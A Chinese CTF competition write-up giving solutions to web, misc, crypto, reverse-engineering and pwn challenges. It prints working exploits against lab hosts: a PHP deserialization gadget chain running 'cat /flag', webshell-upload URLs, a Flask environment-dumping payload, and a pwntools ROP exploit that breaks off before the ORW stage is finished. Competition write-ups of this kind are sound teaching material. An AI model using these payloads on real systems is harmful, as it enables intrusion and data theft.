# 前言

本次比赛混了一个第 7 名

image-20231104191542769

# web

# web1

POP 链:H::__destruct -> H::welcome -> Hacker::__toString

exp:

<?php
// Disable all PHP diagnostics; presumably so that notices do not pollute the
// serialized string echoed at the bottom of this file.
error_reporting(0);
// Sink of the chain: when H::welcome() concatenates a Hacker instance into a
// string, __toString runs and the command below is executed. $exp and $cmd are
// declared but never used in this version of the class.
// Root cause on the target side (inferred): unserialize() of attacker-controlled
// data, which lets any loaded class with magic methods act as a gadget.
class Hacker{
    private $exp;
    private $cmd;
    public  function __toString()
    {
        call_user_func('system', "cat /flag");
    }
}
// Gadget not used by the chain built at the bottom of this file.
// Reading $this->hacker->name triggers __get on objects that define it
// (class C below does).
class A
{
    public $hacker;
    public  function __toString()
    {
        echo $this->hacker->name;
        return "";
    }
}
// Gadget not used by the chain below. Calling the undefined method hacker()
// on $this->finish reaches __call on objects that define it (class K).
class C
{
    public $finish;
    public function __get($value)
    {
        $this->finish->hacker();
        echo 'nonono';
    }
}
// Gadget not used by the chain below. __invoke runs when the object is used as
// a callable (e.g. through call_user_func in K); it then calls welcome() on
// $this->hacker, which both H and R define.
class E
{
    public $hacker;
    public  function __invoke($parms1)
    {   
        echo $parms1;
        $this->hacker->welcome();
    }
}
// Entry point of the chain: __destruct fires when the unserialized object is
// released, welcome() builds a string from $this->username, and the "."
// concatenation is what invokes __toString on a Hacker instance stored there.
class H
{
    public $username;
    public function __destruct()
    {
        $this->welcome();
    }
    public  function welcome()
    {
        echo "welcome~ ".$this->username;
    }
}
// Gadget not used by the chain below. Any undefined method call lands in
// __call, which invokes whatever callable is stored in $this->func with the
// single argument 'welcome' (an E instance would be called via __invoke).
class K
{
    public $func;
    public function __call($method,$args)
    {
        call_user_func($this->func,'welcome');
    }
}
// Gadget not used by the chain below. welcome() ends in
// call_user_func_array($this->method, $this->args) - an arbitrary call if the
// private fields are controlled. $key, $finish1 and $finish are not declared
// on this class; they are read as dynamic properties.
class R
{
    private $method="phpinfo";
    private $args;
    public  function welcome()
    {
        if ($this->key === true && $this->finish1->name) {
            if ($this->finish->finish) {
                call_user_func_array($this->method,$this->args);
            }
        }
    }
}
// Shortest chain: H::__destruct -> H::welcome -> Hacker::__toString.
$h = new H();
$h->username = new Hacker();
echo serialize($h);

image-20231104142758784

image-20231104142827922

# web2

image-20231104143046574

image-20231104143056165

用 glob 进行匹配

import string
import requests
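url = "http://172.10.0.5/"
path = "backdoor_"
# Candidate characters for one position of the file name: all digits, all
# lowercase letters and '.', taken from the string module so that no letter is
# dropped (the hand-typed alphabet used before was missing j, u and v).
zidian = string.digits + string.ascii_lowercase + "."
flag = path
# Extend the known prefix one character at a time: the response contains "yes"
# when the glob:// pattern <prefix><char>* matches at least one file.
while True:
    for i in zidian:
        data = {"filename": "glob://" + flag + i + "*"}
        resp = requests.post(url, data=data).text
        if "yes" in resp:
            flag += i
            print(flag)
            break
    else:
        # No candidate extended the prefix: the name is complete (or a needed
        # character is not in the alphabet). Stop instead of looping forever.
        break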

image-20231104163847480

image-20231104143401062

数组绕过进行命令执行

http://172.10.0.5/backdoor_00fbc51dcdf9eef767597fd26119a894.php?username=1&title[]=shell.php&data[]=%3C?php%20system(%22dir%20/%22);

image-20231104143448613

获取 flag

http://172.10.0.5/backdoor_00fbc51dcdf9eef767597fd26119a894.php?username=1&title[]=shell.php&data[]=%3C?php%20system(%22cat%20/flag%22);

image-20231104143545078

# Web-Escape

image-20231104161604069

原题是 ImaginaryCTF 的 Archived Challenges 中的 Helpful - BONUS,和这题是一样的,直接用官网上的 payload 打了

image-20231104161724409

http://172.10.0.5:10000/?username={passhash.__str__.__globals__[app].wsgi_app.__globals__[os].environ}&password=1

image-20231104161745954

flag{d467150b-6e0b-4a9a-96c1-2148c6edcd5f}

# Web-Tera

image-20231104162617896

题目打开

image-20231104162700332

很明确的一个模板注入的题目

image-20231108185126044

image-20231104170034666

# WEB-HTTP

image-20231104183825000

这里打开页面是一个游戏,没什么东西,先扫描一下目录

image-20231104183741153

这里有一个 /swagger-resources 目录,于是去找了一下相关文章

image-20231104184030036

这里找了一下相关文章 Swagger 未授权访问漏洞 - 腾讯云开发者社区 - 腾讯云 (tencent.com)

这里存在 Swagger 未授权访问漏洞,检索到了一个 /swagger-ui/index.html 路径,直接访问

image-20231104184136199

这里点击 proxy

image-20231104184158122

这里点击 try it out

image-20231104184217802

这里多了一个 url 参数可控

image-20231104184239589

这里换种访问方式

image-20231104184309698

使用 file 协议去访问,发现显示协议无效;这里 p 牛的知识星球有说过,可以使用 url: 绕过

image-20231104184423635

然后这里显示只能展示 html,使用 #绕过即可

image-20231104184453620

# MISC

# Misc - 我的壁纸

image-20231104170329847

拿到附件用 foremost 分离出三个文件

image-20231104170436633

文本文件

image-20231104170619547

使用 snow 解密

image-20231104170708193

密码:snowday

image-20231104170728381

拿到了一部分

音频文件是无线电,题目上也给了提示使用 Robot 36

image-20231104170918284

然后扫描二维码

image-20231104171006523

中间一段,图片使用 steghide 解

image-20231104171033620

密码是:7hR@1nB0w$

image-20231104171346412

拼接一下即可

# Crypto

# leak rsa

深搜拿到高位,但是得到了很多组候选,说明结果不是完全正确的

N=73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923
C=71808322808599218331233291542779486534747913572475630198802984648982830332628443972652322590637382696027943799004331488098592525306523343649935216419522329722152742610560398216737030893090641493326477786720839849938277402743820773957184083430369443325368720115515840174745825798187125454448297155036065857691
gift=2223117424030234543005449667053988296724455736030907136592525175314696509716321
from Crypto.Util.number import *
PQ = [('', '')]
pq_add0=[('0','0'), ('1','1')]
pq_add1=[('0','1'), ('1','0')]
b_gift='0'+bin(gift)[2:]
pq_add2=pq_add1+pq_add0
for i in range(262):
    pq=[]
    for p_org, q_org in PQ:
        if b_gift[i]=='0':
            for a,b in pq_add0:
                p_if,q_if=p_org+a,q_org+b
                p_min,p_max=p_if.ljust(512,'0'),p_if.ljust(512,'1')
                q_min,q_max=q_if.ljust(512,'0'),q_if.ljust(512,'1')
                if  int(p_min,2) * int(q_min,2) <= N <= int(p_max,2) * int(q_max,2):
                    pq.append((p_if, q_if))
        elif b_gift[i] == '1':
            for a, b in pq_add1:
                p_if, q_if = p_org + a, q_org + b
                p_min, p_max = p_if.ljust(512, '0'), p_if.ljust(512, '1')
                q_min, q_max = q_if.ljust(512, '0'), q_if.ljust(512, '1')
                if int(p_min, 2) * int(q_min, 2) <= N <= int(p_max, 2) * int(q_max, 2):
                    pq.append((p_if, q_if))
    PQ = pq
print(PQ)

我们尝试对一位爆破

from Crypto.Util.number import *
# Candidate (p, q) prefix pairs produced by the prefix search; one more bit is
# still undecided, so both completions of every prefix are generated below.
p=[('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101010100100000010', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110101111001100011'), ('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101010100100000011', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110101111001100010'), ('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000001010', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101101011'), ('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000100010', 
'1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101000011'), ('1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000100011', '1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101000010'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101000010', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000100011'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101000011', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000100010'), 
('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110011001101101011', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101100010000001010'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110101111001100010', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101010100100000011'), ('1100111011010111101010100001110101111111100110111010101010011101100000101101010010101000010011001110110001011011011010000000100000111100111011101111100011110110111000000101100100101100100011111110011000101011011010100011001010101100111000100100110101111001100011', '1000001000011100010101010110000111101011000100111100000111111100011001101101101110100111101010111011001100111101001100010011110010100000001100010100110110000110000100101000111110110000101100100010111111001101001000001001111101111010000011111000101010100100000010')]
# Every prefix (p first, then q, per pair) extended by a 0 and then by a 1,
# converted to an integer: the high-bit candidates handed to Coppersmith.
D = [int(prefix + tail, 2) for pair in p for prefix in pair for tail in "01"]

放在 copper 里面进行爆破

# Coppersmith step (SageMath syntax): for every candidate high-bit value, look
# for a small root x of f(x) = x + (candidate << kbits) modulo n, i.e. recover
# the unknown low bits of a prime factor.
n=73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923
p=[7532893609209503433401207114936112283562745074605666595854962703328723243192836, 7532893609209503433401207114936112283562745074605666595854962703328723243192837, 11975359106462250866004610445325637689150797603362754225369957476901819007810758, 11975359106462250866004610445325637689150797603362754225369957476901819007810759, 7532893609209503433401207114936112283562745074605666595854962703328723243192838, 7532893609209503433401207114936112283562745074605666595854962703328723243192839, 11975359106462250866004610445325637689150797603362754225369957476901819007810756, 11975359106462250866004610445325637689150797603362754225369957476901819007810757, 7532893609209503433401207114936112283562745074605666595854962703328723243206676, 7532893609209503433401207114936112283562745074605666595854962703328723243206677, 11975359106462250866004610445325637689150797603362754225369957476901819007788758, 11975359106462250866004610445325637689150797603362754225369957476901819007788759, 7532893609209503433401207114936112283562745074605666595854962703328723243206724, 7532893609209503433401207114936112283562745074605666595854962703328723243206725, 11975359106462250866004610445325637689150797603362754225369957476901819007788678, 11975359106462250866004610445325637689150797603362754225369957476901819007788679, 7532893609209503433401207114936112283562745074605666595854962703328723243206726, 7532893609209503433401207114936112283562745074605666595854962703328723243206727, 11975359106462250866004610445325637689150797603362754225369957476901819007788676, 11975359106462250866004610445325637689150797603362754225369957476901819007788677, 11975359106462250866004610445325637689150797603362754225369957476901819007788676, 11975359106462250866004610445325637689150797603362754225369957476901819007788677, 7532893609209503433401207114936112283562745074605666595854962703328723243206726, 7532893609209503433401207114936112283562745074605666595854962703328723243206727, 
11975359106462250866004610445325637689150797603362754225369957476901819007788678, 11975359106462250866004610445325637689150797603362754225369957476901819007788679, 7532893609209503433401207114936112283562745074605666595854962703328723243206724, 7532893609209503433401207114936112283562745074605666595854962703328723243206725, 11975359106462250866004610445325637689150797603362754225369957476901819007788758, 11975359106462250866004610445325637689150797603362754225369957476901819007788759, 7532893609209503433401207114936112283562745074605666595854962703328723243206676, 7532893609209503433401207114936112283562745074605666595854962703328723243206677, 11975359106462250866004610445325637689150797603362754225369957476901819007810756, 11975359106462250866004610445325637689150797603362754225369957476901819007810757, 7532893609209503433401207114936112283562745074605666595854962703328723243192838, 7532893609209503433401207114936112283562745074605666595854962703328723243192839, 11975359106462250866004610445325637689150797603362754225369957476901819007810758, 11975359106462250866004610445325637689150797603362754225369957476901819007810759, 7532893609209503433401207114936112283562745074605666595854962703328723243192836, 7532893609209503433401207114936112283562745074605666595854962703328723243192837]
pbits=512  
for p4 in p:
    # Number of unknown low bits once the recovered prefix is aligned to 512.
    kbits=pbits - p4.nbits()
    print (p4.nbits())
    p4 = p4 << kbits
    PR.<x> = PolynomialRing(Zmod(n))
    f = x + p4
    # beta=0.5: the root is wanted modulo a divisor of n of size about n^0.5
    # (a prime factor); X bounds the root by the number of unknown bits.
    roots = f.small_roots(X=2^kbits,beta=0.5,epsilon=0.01)
    print(roots)

拿到一组比较短的根就行,它对应的就是 p 或 q 的低位

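# High bits of one prime (the candidate whose Coppersmith root came back
# short), aligned to 512 bits and completed with that root.
p4=11975359106462250866004610445325637689150797603362754225369957476901819007810757
kbits=512-p4.bit_length()
p4 = p4 << kbits
p=p4+611414793025621783063521676721076724031914595699228956891999095186369770019
n=73822410148110759760164946405270228269255384237831275745269402590230495569279769799226813942899942423718229747478982630879557319063920515141217164980012063064986634632452289290326704640527699568662492105204165609614169349755365956569362139057327962393611139347462018186440108621311077722819578905265976612923
q=n//p
c=71808322808599218331233291542779486534747913572475630198802984648982830332628443972652322590637382696027943799004331488098592525306523343649935216419522329722152742610560398216737030893090641493326477786720839849938277402743820773957184083430369443325368720115515840174745825798187125454448297155036065857691
e = 65537


def _modinv(a, m):
    """Return a^-1 mod m by the extended Euclidean algorithm.

    Replaces Crypto.Util.number.inverse, which this listing used without
    importing it. Raises ValueError when gcd(a, m) != 1.
    """
    old_r, r = a % m, m
    old_s, s = 1, 0
    while r:
        quot = old_r // r
        old_r, r = r, old_r - quot * r
        old_s, s = s, old_s - quot * s
    if old_r != 1:
        raise ValueError("inverse does not exist")
    return old_s % m


# Fail loudly if the reconstructed p is not a factor; q = n // p would
# otherwise be garbage and the "flag" silently wrong.
if n % p:
    raise ValueError("candidate p does not divide n")
d=_modinv(e,(p-1)*(q-1))
m = pow(c, d, n)
# Big-endian minimal byte string, the same encoding long_to_bytes() produces.
flag = m.to_bytes((m.bit_length() + 7) // 8, "big")
print(flag)
# b'flag{6eb67115-38b1-4e75-b3fc-de3a9697e565}'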

# SecretShare

前面是 mt19937,因为够 624,可以直接预测随机数,然后构造矩阵解决得到 p,然后正常解 rsa 就行

import re
from randcrack import RandCrack
from sage.all import matrix, Zmod, inverse_mod
from Crypto.Util.number import *
# Read the challenge transcript as raw bytes; extract_numbers() pulls the
# decimal values out of it.
with open("output.txt", mode="rb") as transcript:
    f = transcript.read()
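def extract_numbers(string):
    """Return every run of decimal digits in *string* as a list of str.

    Accepts bytes as well as str: the transcript is opened in binary mode
    above, and re raises TypeError when a str pattern is applied to bytes.
    """
    if isinstance(string, (bytes, bytearray)):
        string = string.decode("utf-8", errors="replace")
    return re.findall(r'\d+', string)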
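def get_predict(X):
    """Predict the next getrandbits(1024) output from the 20 values in X.

    Each 1024-bit value is split into 32 words of 32 bits, least significant
    word first; the last 624 words (the MT19937 state size) are fed to
    RandCrack and the next 1024-bit draw is returned.
    """
    # The original appended to an undefined name (T) and raised NameError.
    words = [(X[i] >> (32 * j)) & 0xFFFFFFFF
             for i in range(20)
             for j in range(1024 // 32)]
    D = words[-624:]
    rc = RandCrack()
    for w in D:
        rc.submit(w)
    return rc.predict_getrandbits(1024)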
# The transcript lists pairs: X[i] then R[i] (20 pairs - get_predict() reads
# exactly 20 X values).
data = extract_numbers(f)
X, R = [], []
for i in range(0, len(data), 2):
    X.append(int(data[i]))
    R.append(int(data[i + 1]))
# 21st point: the predicted next X, paired with the leaked R value.
# NOTE(review): `leak`, `p`, `N` and `C` are not defined anywhere in this
# listing - presumably the challenge's published values; `ZZ` (Sage's integer
# ring) would also need to come from sage.all.
X.append(get_predict(X))
R.append(leak)
# Vandermonde system over Z/pZ: XX[i, j] = X[j]^i, so A * XX = R recovers the
# polynomial coefficients; A[0] is the constant term, i.e. the shared secret.
XX = matrix(Zmod(p), 21, 21)
for i in range(21):
    for j in range(21):
        XX[i, j] = pow(X[j], i, p)
R = matrix(Zmod(p), R)
A = XX.solve_left(R)
secret = ZZ(A.list()[0])
# The secret is one RSA prime; the rest is a textbook decryption.
new_p = secret
new_q = N // new_p
d = inverse_mod(65537, (new_p - 1) * (new_q - 1))
flag = long_to_bytes(pow(C, d, N))
print(flag)

# re

# Re - 安全编程

F20FE11DCB824368A28CA1539DCD32F5.png
puzzle solver 扫一下,发现直接异或 0x80 就能出,当成 misc,属实非预期了。
MYI2`EQL)BH~{6LO7)LE5Z9.png

# Re-babyre

先跑随机数

#include<stdlib.h>
#include<cstdio>
#include<iostream>
#include<windows.h>
using namespace std;
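// Dump the PRNG stream the target consumes: seed with the constant used by the
// binary and print the first 32 * 7 rand() values as a C-style list.
// NOTE(review): the stream depends on the C runtime's rand() implementation
// (the build pulls in <windows.h>, so presumably MSVC's); another runtime
// seeded identically prints different values.
int main() {
	const unsigned int seed = 0xdeadc0de;
	const int count = 32 * 7;  // number of rand() values dumped
	srand(seed);
	for (int i = 0; i < count; ++i)
		// printf needs <cstdio> explicitly (relying on <iostream> to pull it in
		// is not guaranteed); %x expects an unsigned argument, hence the cast.
		std::printf("0x%x,", static_cast<unsigned int>(rand()));
	return 0;
}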

本来想用 z3 求解,但是没解出来:

from z3 import *
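# Twelve unknown plaintext bytes, one 8-bit symbol each.
c = [BitVec("c%d" % i, 8) for i in range(12)]
s = c[:]
p = Solver()
# Round constants: the rand() outputs dumped by the C++ program above. The
# model reads rd[0] .. rd[191] (32 rounds x 6 values); fill this list in
# before running - left empty it used to die with an IndexError inside the loop.
rd = []
ROUNDS = 32
if len(rd) < ROUNDS * 6:
    raise ValueError("rd must hold at least %d rand() outputs" % (ROUNDS * 6))


def _word(b0, b1, b2, b3):
    """Pack four 8-bit symbols into one 32-bit word, b0 least significant.

    Widening first is essential: on an 8-bit z3 BitVec `x << 24` is simply 0,
    so the original `(s[3] << 24) | ... | s[0]` collapsed every word to s[0]
    and the whole model ran in 8 bits.
    """
    return ((ZeroExt(24, b3) << 24) | (ZeroExt(24, b2) << 16)
            | (ZeroExt(24, b1) << 8) | ZeroExt(24, b0))


def _bytes(w):
    """Split a 32-bit word back into four 8-bit symbols, low byte first."""
    return [Extract(hi, hi - 7, w) for hi in (7, 15, 23, 31)]


def _mix(x, k0, k1):
    """Round term (k0 + (x >> 7)) + (k1 ^ (((x >> 15) ^ (x << 10)) | 3)).

    All arithmetic is mod 2**32 because the operands are 32-bit, so the
    `& 0xffffffff` masks of the original are implicit. Shifts use LShR: the
    words are unsigned in the target (the decryption listing uses plain
    Python ints), whereas `>>` on a z3 BitVec is an arithmetic shift.
    """
    v11 = LShR(x, 7)
    v13 = (LShR(x, 15) ^ (x << 10)) | 3
    return (k0 + v11) + (k1 ^ v13)


for k in range(ROUNDS):
    # Per-byte affine step first; 8-bit arithmetic wraps by itself.
    s = [23 * b + 66 for b in s]
    v5, v6, v7 = _word(*s[0:4]), _word(*s[4:8]), _word(*s[8:12])
    rk = rd[k * 6:k * 6 + 6]
    v5 = v5 + _mix(v6, rk[0], rk[1])
    v6 = v6 + _mix(v7, rk[2], rk[3])
    v7 = v7 + _mix(v5, rk[4], rk[5])  # uses the already-updated v5
    s = _bytes(v5) + _bytes(v6) + _bytes(v7)

# Target words for the first 12-byte block only.
# NOTE(review): they must be packed with the same byte order as _word (little
# endian, as int.from_bytes(..., "little") does in the decryption listing);
# check these constants against the first 12 ciphertext bytes before trusting
# an unsat result.
p.add(v5 == 0xA0484D3B)
p.add(v6 == 0x27312854)
p.add(v7 == 0x6DF12135)
result = p.check()
print(result)
if result == sat:
    model = p.model()
    print(bytes(model.eval(b, model_completion=True).as_long() for b in c))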

后来考虑直接写解密算法,大小端还是比较绕的;前面的部分解完之后,最后 encrypt1 的解密还是采用爆破(查表)的方式

# rand() outputs dumped by the C++ program above (seed 0xdeadc0de); the
# decryption consumes rand[0] .. rand[191], i.e. 32 rounds x 6 values.
rand=[0x4df2,0x7125,0x3739,0xde6,0x2755,0x7a13,0x7e6a,0x2ea4,0xd66,0x6d41,0x39ff,0x2cc9,0x2f8f,0x233d,0x6bde,0x1fef,0x2f12,0x4018,0x5065,0x194e,0x4555,0x106b,0x575c,0x8e0,0x247c,0x3798,0x2927,0x7dc4,0x463d,0x1352,0xc40,0x45e1,0x1cf0,0x7860,0x3ee5,0x30cb,0x5ae6,0x2c9d,0x190e,0x79ea,0x43fc,0x4244,0xaa2,0x1dd9,0x3d70,0x386a,0x49ea,0x1f0c,0xff3,0x4cc,0x4646,0x7db6,0xfff,0x6acb,0x331f,0x66e9,0x206a,0x43b5,0x3f1c,0x5eff,0x433c,0x1c46,0x4b99,0x6b3a,0x2cbe,0x4b6f,0x3855,0x7ea7,0xcd3,0x6655,0x176a,0x2e48,0x28b,0x359d,0x5d83,0x7071,0x6df6,0xfe7,0x6249,0x6b73,0x1436,0x3d98,0x451e,0x1778,0x49d8,0x49dd,0xa0e,0x37ae,0x1765,0x64ed,0x302,0x6ea8,0xc33,0x3b8e,0x5937,0x7201,0x3381,0x67da,0x4aef,0x2142,0x5fc3,0x5f43,0x7167,0x405,0x403b,0x1d5,0x2308,0x735b,0x74c9,0x2ebb,0x45e1,0x726c,0x1404,0x205,0x2655,0x7a5d,0x5789,0x1fa8,0x2611,0x3d77,0x6294,0x2fc6,0x5742,0x2585,0x56cd,0x7030,0x5804,0x117d,0x2b64,0x7f2a,0x21d,0x1663,0x7a5f,0x436e,0x42eb,0x476b,0x3833,0x1573,0x2f9b,0x495e,0x992,0xdee,0x299c,0x353e,0x2b85,0x1d9a,0x2753,0xe2d,0x21ba,0x5234,0x7511,0x4e8b,0x1f1f,0x6cca,0x242,0x505f,0x5cb0,0x2d36,0xee7,0x14f8,0x528c,0x76e6,0x4d46,0x2fd4,0x74f,0x32de,0x4bdf,0x58c0,0x699c,0x12ff,0x3ba3,0x6941,0x67f9,0x1a89,0x6661,0x4933,0x3ae0,0xfdf,0x6981,0xeb0,0x1512,0x3b8a,0x8f4,0x5533,0x2e2f,0x1881,0x2e6b,0xffd,0x5b84,0x59a7,0x68c7,0x5bb8,0x2b24,0x6896,0x7fd1,0x135b,0x353a,0x419b,0x702c,0x2c4d,0x179d,0x5101,0x6388,0x1dcd,0x4fa5,0x3593,0x7917,0x5791,0x663e,0xc5c,0x7245,0xbad,0x223a,0x29b1,0x17a4,0x4fb7,0x34ec,0x6372,0x6a25,0x5929,0x14f2,0x508c,0x748e,0x5906]
# Index of the next round constant to use (reset per block below).
randi=0
# Inverse table of encrypt1: ciphertext byte -> plaintext byte (filled below).
dict1={}
def encrypt1(c):
	"""Forward per-byte step of the cipher: the affine map c -> 23*c + 66 on bytes.

	The result is reduced modulo 256 so it always fits in one byte.
	"""
	return (23 * c + 66) % 256
# Invert encrypt1 by tabulation: 23 is odd, so the byte map is a bijection
# and every ciphertext byte has exactly one preimage.
dict1.update({encrypt1(v): v for v in range(256)})
# Ciphertext (48 bytes = 4 blocks of 12).
c=[0x48, 0x4d, 0x3b, 0xa0, 0x27, 0x31, 0x28, 0x54, 0x6d, 0xf1, 0x21, 0x35, 0x18, 0x73, 0x6a, 0x4c, 0x71, 0x3b, 0xbd, 0x98, 0xb6, 0x5a, 0x77, 0x2d, 0xb, 0x2b, 0xcb, 0x9b, 0xe4, 0x8a, 0x4c, 0xa9, 0x5c, 0x4f, 0x1b, 0xf1, 0x98, 0x3d, 0x30, 0x59, 0x3f, 0x14, 0xfc, 0x7a, 0xf4, 0x64, 0x2, 0x2b]
# Decrypt block by block (12 bytes each), undoing the 32 rounds in reverse.
# Byte order: each 4-byte group is read little-endian (int.from_bytes below),
# and since the words are non-negative Python ints all shifts are logical.
for ip in range(0,len(c),12):
    # Round constants are consumed backwards from index 191 (32 rounds x 6
    # values), starting over for every block.
    randi = 191
    for _ in range(32):
        getenc=c[ip:ip+12]
        data=[i for i in getenc]
        data1=[]
        for i in range(0,len(data),4):
            data1.append(int.from_bytes(data[i:i+4],"little"))
        # NOTE: `get` aliases data1 (no copy), so each mixing term sees the
        # words as they are restored one at a time: word 2 is undone with the
        # current word 0, then word 1 with the restored word 2, then word 0
        # with the restored word 1 - the encryption order run backwards.
        get = data1
        v23 = get[0] >> 7
        v24 = rand[randi-1] + v23
        v25 = (get[0] >> 15) ^ (get[0] << 10) | 3
        data1[2] -= v24 + (rand[randi] ^ v25)
        data1[2] &= 0xffffffff
        randi -= 2
        v23 = get[2] >> 7
        v24 = rand[randi-1] + v23
        v25 = (get[2] >> 15) ^ (get[2] << 10) | 3
        data1[1] -= v24 + (rand[randi] ^ v25)
        data1[1] &= 0xffffffff
        randi -= 2
        v23 = get[1] >> 7
        v24 = rand[randi-1] + v23
        v25 = (get[1] >> 15) ^ (get[1]<< 10) | 3
        data1[0] -= v24 + (rand[randi] ^ v25)
        data1[0]&=0xffffffff
        randi -= 2
        # Turn each word back into little-endian bytes (hex -> bytes, reversed),
        # undo the per-byte affine step through dict1, and write the result
        # into c so the next round reads the partially decrypted block.
        for x in range(3):
            i1=[i for i in bytes.fromhex(hex(data1[x])[2:].rjust(8,"0"))][::-1]
            for i2 in range(4):
                c[ip+4*x+i2]=dict1[i1[i2]]
print("".join(map(chr,c)))

# Re-BadRe

image.png
DIE 能扫出来是 64 位程序,但是跑不起来,猜测是 PE 结构有问题,上 CFF Explorer
image.png
发现这个 ATOM 段有问题 Raw Address 错误。
image.png
这边是对这个 Section 解密
跑起来 dump
image.png
发现实际上解密出来了一个 PE 文件,可以看到 PE 头了,然后 dump 下这个节,下面的应该是 PE 重载的过程
image.png
载入后发现是个 rc4
image.png
解出来就行 flag

# pwn

# PWN-silent

# 程序分析

就是直接溢出,没有开启 canary,沙箱禁用了 execve;难点就是调用的函数太少,需要不断布局控制执行流。刚开始是想用 gadget 直接修改而不用爆破,但是没有找到。

思路就是利用 read 修改 bss 段中残留的 libc 地址为 syscall (并利用爆破),然后利用 read 控制 rax 调用 write 泄露 libc 打一个 orw

image-20231104144603787

img

# exp

from pwn import *
# Target libc (2.27) and the vulnerable binary.
libc = ELF("/home/clown/Desktop/libc-2.27.so")
elf = ELF("./silent")
# ROP gadgets and .bss addresses. They are absolute: the binary is evidently
# not position independent (fixed 0x40xxxx / 0x60xxxx values), which is what
# makes a stack pivot to a known address possible.
ret = 0x4008FD
pop_rdi = 0x400963
pop_rsi_r15 = 0x400961
bss1 = 0x601010
bss2 = 0x6010A0
leave = 0x4008FC
pop_rsp_3xx = 0x40095D
null = 0x602088
# Location in .bss that, per the write-up, still holds a leftover libc pointer.
bss_libc = 0x601030 - 0x28
def start(p):
    """Run one exploitation attempt over the tube *p*.

    Stage 1 overflows the stack buffer (no canary) and pivots the stack into
    .bss with `leave`; stage 2 patches a leftover libc pointer with a 3-byte
    partial overwrite, leaks a libc address through the resulting call, and
    finishes with an open/read/write chain. The partial overwrite only lands
    for some ASLR layouts, which is why the caller retries in a loop. On any
    exception the tube is closed and the function returns; on success it
    blocks in p.interactive().
    """
    # Stage 1: 0x40 bytes of padding, a fake saved rbp pointing into .bss,
    # then read(0, bss2 - 0x10, ...) followed by `leave` to pivot the stack.
    payload = b'a' * 0x40 + p64(bss2 - 0x18) + p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(bss2 - 0x10) + p64(0) + p64(elf.plt['read']) + p64(leave)
    p.send(payload)
    sleep(0.1)
    
    # ROP chain staged in .bss: read the next payloads to fixed addresses and
    # hop between them with pop rsp.
    payload = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(bss_libc) + p64(0) + p64(elf.plt['read'])
    payload += p64(pop_rsp_3xx) + p64(0x6010D0 - 0x18)  # return into the ROP chain
    payload += p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x601038) + p64(0) + p64(elf.plt['read'])
    payload += p64(pop_rsi_r15) + p64(null) + p64(0) + p64(elf.plt['read'])
    payload += p64(pop_rsp_3xx) + p64(bss_libc - 0x18)
    p.send(payload)
    sleep(0.1)
    
    # Trigger the call that leaks a libc address: the final 3 bytes overwrite
    # only the low bytes of the leftover libc pointer (partial overwrite), so
    # whether it lands depends on the randomized bits - hence the retry loop.
    payload = p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(elf.got['alarm']) + p64(0) + b'\xf5\x54\x4A'
    p.send(payload)
    sleep(0.1)
    
    # Stage 2: read the open/read/write chain into .bss.
    payload = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x601068) + p64(0) + p64(elf.plt['read'])
    p.send(payload)
